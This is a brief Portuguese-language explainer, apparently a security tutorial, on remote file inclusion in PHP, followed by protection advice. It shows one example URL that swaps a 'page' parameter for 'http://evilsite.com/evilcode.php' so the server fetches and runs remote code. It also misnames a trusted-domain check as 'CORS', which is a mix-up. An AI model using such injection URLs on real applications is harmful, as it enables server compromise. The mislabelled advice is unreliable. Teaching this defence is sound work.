Execução de código malicioso a partir de um input da aplicação.
Em um cenário que uma aplicação PHP, após a autenticação, faça um redirecionamento utilizando a seguinte URL: "http://testsite.com/index.php?page=contact.php". O atacante poderia trocar a URL para "http://testsite.com/?page=http://evilsite.com/evilcode.php". Com isso, uma aplicação despreparada acaba por executar o "evilcode.php".
Como se proteger?
No caso do exemplo, em que há uma referência a um recurso, bastaria verificarmos se a URL destino é de um domínio confiável (CORS). Em outros casos, precisamos sanitizar o conteúdo. Evitando que código malicioso seja executado.